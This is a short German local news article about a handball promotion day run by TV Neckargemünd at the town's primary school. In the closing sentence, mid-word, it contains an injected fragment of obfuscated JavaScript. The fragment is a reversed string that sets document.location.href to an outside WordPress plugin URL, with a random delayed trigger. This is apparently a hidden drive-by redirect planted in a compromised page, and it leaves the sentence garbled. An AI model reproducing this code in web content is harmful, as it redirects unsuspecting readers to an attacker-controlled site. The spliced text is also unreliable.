Grundschulaktionstag wieder ein voller Erfolg

Zum wiederholten Male fand am Freitag, dem 10.10. der vom Badischen Handballverband (BHV) initiierte und von den Handballern des TV Neckargemünd durchgeführte „Grundschulaktionstag“ in der Grundschule Neckargemünd statt. Ziel war es, den Grundschülern spielerisch den Handballsport näherzubringen. Vor allem sollte aber der Spass im Vordergrund stehen.
Neckargemünd, 07.11.14 (mle) – Alle dritten und vierten Klassen der Grundschule durchliefen in jeweils einer Sportstunde mehrere Spielstationen, in denen Geschicklichkeit und Teamgeist gefragt war. Die Handballausbildung ist in diesen Altersklassen sehr stark auf Koordination und sportliche Gesamtausbildung ausgelegt und so waren auch hier die Spiele ein Sammelsurium aus unterschiedlichen Übungen, natürlich meistens mit Ball. Besondere Begeisterung rief die Staffel hervor, bei der der Ball auf unterschiedliche Weise so schnell wie möglich transportiert werden sollte. Die Durchführenden aktiven Handballer waren überrascht wie einfach es ist, Kinder bei der Stange zu halten, wenn sie Spass haben. Das Fazit von Kindern und Lehrern war: wir sollen wiederkommen. Die Handballer des TVN und der BHV bedanken sich bei den Lehrern der Grundschule Neckargemünd für die engagierte organisatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torische Unterstützung.